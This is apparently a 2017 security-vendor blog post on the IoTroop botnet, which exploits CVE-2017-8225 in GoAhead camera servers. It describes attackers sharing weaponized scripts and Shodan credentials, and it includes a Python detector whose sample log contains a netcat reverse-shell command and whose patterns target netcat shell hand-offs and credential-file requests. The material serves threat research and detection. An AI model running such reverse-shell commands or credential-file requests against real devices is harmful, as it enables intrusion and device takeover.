A Huge Wave of IoT Zombies Are Coming

NewSky Security
Oct 25, 2017

Introduction

Evolution is integral to malware: attackers need to stay one step ahead of defenders to evade detection. While IoT malware started with simple attacks that relied on weak passwords, it has kept evolving toward more strategic approaches, such as cross-platform exploits, to affect a larger number of devices.

The default-password attack is close to saturation: the devices that can be hacked easily via default passwords have already been hacked. With the recent awareness of IoT threats, many organizations and consumers have also started using stronger passwords, forcing attackers to take different routes. The IoT threat space recently expanded to include a new botnet called IoTroop, which uses exploits instead of weak passwords to take over devices.

One attack vector used by IoTroop is CVE-2017-8225, a vulnerability in the custom GoAhead embedded web servers used by many IoT camera manufacturers. In this blog we discuss the "MDLC" (Malware Development Life Cycle), tracking how a proof of concept is weaponized and used by various attackers who share information and resources.

Weaponized scripts integrated with Shodan

We observed an attacker claiming to have scripts for a weaponized CVE-2017-8225 exploit, along with screenshots of the scripts in action.

The attacker made two scripts available on forums. The first uses a known GoAhead-related Shodan query (a "dork") to dump the IP addresses of all devices that appear vulnerable to CVE-2017-8225.

Once the vulnerable IPs are collected, the second script uses CVE-2017-8225 to dump credentials from those devices. The combination lets script kiddies take control of a variety of IoT devices without worrying about two important questions: WHERE (to find devices that can be hacked) and HOW (to hack them).

Netcat for the reverse shell

When a fellow attacker asked about the status of the botnet formed from this attack, the author replied that he needs a VPS with which he can use netcat; once that is done, the botnet is "good to go".

On the IoTroop-compromised devices we indeed observed a netcat command used for the reverse shell. This is also consistent with Check Point's findings, leading us to speculate that this attacker and the IoTroop author were thinking along the same lines.
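Both observations above (unauthenticated credential dumps via CVE-2017-8225, and netcat wired to a shell on compromised cameras) are straightforward to spot in logs. The following detector is an added example written for this post; it is not NewSky's IoT Halo code. It scans web-server access lines for requests to the GoAhead camera's credential files (system.ini / system-b.ini, the files the vulnerable firmware serves without checking the caller's login) and scans device command records for netcat invocations that hand off a shell. The log formats, device names, indicator labels and sample lines are all constructed assumptions for the example.

```python
"""Detection for the two IoTroop indicators described above.

Added example; this is not NewSky's IoT Halo code. The sample logs are
constructed (RFC 5737 documentation addresses), and the log formats,
device names and indicator labels are assumptions made for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Indicator 1: request for a GoAhead camera's credential store (CVE-2017-8225).
# The vulnerable firmware serves system.ini / system-b.ini without checking
# the caller's login, so a single unauthenticated request discloses the admin
# credentials. For detection the request path alone is the signal: a
# legitimate client never fetches these files through the web interface.
CVE_2017_8225_REQUEST = re.compile(
    r'"(?P<method>[A-Z]+)\s+(?P<path>/system(?:-b)?\.ini)(?:\?[^\s"]*)?\s+HTTP/',
    re.IGNORECASE,
)
# Combined-log-format line: the client IP is the first token.
CLIENT_IP = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s")

# Indicator 2: netcat handing a shell to a remote host (the reverse shell seen
# on IoTroop-compromised devices). Require both a netcat binary and a shell
# hand-off in the same command so that plain port checks (`nc -z host 80`)
# do not fire.
NETCAT_BIN = re.compile(r"(?:^|[\s;|&])(?:nc|ncat|netcat)(?:\s|$)")
SHELL_HANDOFF = re.compile(r"(?:-e\s+|\|\s*)(?:/bin/)?(?:ba|a|d)?sh\b")
# Assumed command-log format: "<device> <process>: <command line>".
COMMAND_RECORD = re.compile(r"^(?P<host>\S+)\s+\S+:\s+(?P<cmd>.+)$")


@dataclass(frozen=True)
class Finding:
    source: str      # client IP (HTTP log) or device name (command log)
    indicator: str   # short indicator label
    evidence: str    # the log content that triggered the finding


def scan_http_log(lines: Iterable[str]) -> List[Finding]:
    """Flag every access-log line that requests the camera's credential file."""
    findings = []
    for line in lines:
        if not CVE_2017_8225_REQUEST.search(line):
            continue
        ip = CLIENT_IP.match(line)
        findings.append(Finding(
            source=ip.group("ip") if ip else "unknown",
            indicator="cve-2017-8225-credential-disclosure-attempt",
            evidence=line.strip(),
        ))
    return findings


def scan_command_log(lines: Iterable[str]) -> List[Finding]:
    """Flag device command records where netcat is wired to a shell."""
    findings = []
    for line in lines:
        rec = COMMAND_RECORD.match(line.strip())
        if not rec:
            continue
        cmd = rec.group("cmd")
        if NETCAT_BIN.search(cmd) and SHELL_HANDOFF.search(cmd):
            findings.append(Finding(rec.group("host"), "netcat-reverse-shell", cmd))
    return findings


def summarize(findings: Iterable[Finding]) -> Dict[str, List[str]]:
    """Group distinct sources by indicator, e.g. to build a block list or alert."""
    grouped: Dict[str, set] = {}
    for f in findings:
        grouped.setdefault(f.indicator, set()).add(f.source)
    return {k: sorted(v) for k, v in grouped.items()}


# Constructed sample data.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [25/Oct/2017:10:01:12 +0000] "GET /system.ini HTTP/1.1" 200 1536 "-" "python-requests/2.18.4"',
    '192.0.2.14 - - [25/Oct/2017:10:01:20 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Oct/2017:10:01:31 +0000] "GET /system-b.ini HTTP/1.1" 200 1536 "-" "python-requests/2.18.4"',
    '198.51.100.9 - - [25/Oct/2017:10:02:02 +0000] "GET /live.htm HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]
SAMPLE_COMMAND_LOG = [
    "cam-01 sh: nc 203.0.113.7 4444 -e /bin/sh",
    "cam-01 sh: ps",
    "cam-02 sh: nc -z 192.168.50.2 554",
    "cam-02 sh: /bin/sh -c /usr/sbin/ntpd",
]

if __name__ == "__main__":
    all_findings = scan_http_log(SAMPLE_ACCESS_LOG) + scan_command_log(SAMPLE_COMMAND_LOG)
    for f in all_findings:
        print(f"[{f.indicator}] {f.source}: {f.evidence}")
    print(summarize(all_findings))
```

On the sample data the HTTP scan fires twice for 203.0.113.7 and never for the normal page requests, and the command scan fires only for the camera whose netcat invocation carries a shell, not for the port check. The HTTP rule matches on the credential-file path rather than on any particular query string, so variations of the scripted request are still caught; a 200 response to such a request is the signal that the device is unpatched and its credentials should be treated as exposed.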

Attacker collaboration

However, there is a small catch in the script: for the setup to work, the attacker needs access to Shodan Premium. We noted the exploit author asking for Shodan credits and claiming that, if he could get access to Shodan Premium, he would set up a botnet for any purpose.

Soon afterwards, a fellow attacker agreed to share his Shodan credentials if that would help form the botnet.

From here on the thread went silent: no questions asked, no updates.

A proof of concept for CVE-2017-8225 had already been released by a security researcher. However, the weaponized version's ease of use and Shodan integration make it much easier for script kiddies to get control of devices. The attacker expressed similar thoughts when someone accused him of simply copying most of the code from the original POC.

We also observed claims of people using these scripts to add more IoT devices to their existing botnets.

Conclusion

While it is intriguing to identify the exact group behind the attacks, the bigger picture in IoT security (or any form of cybersecurity) is that if there is a known way to successfully attack a device, it is only a matter of time before someone with bad intentions abuses it for their own purposes. A huge number of devices vulnerable to CVE-2017-8225 were simply visible in Shodan, just waiting to be attacked. Without any security measures or a patch, they are now at risk of becoming part of the IoTroop botnet.

NewSky Security IoT Halo proactively provides detection for CVE-2017-8225 attack attempts.

Ankit Anubhav, Principal Researcher, NewSky Security (@newskysecurity)
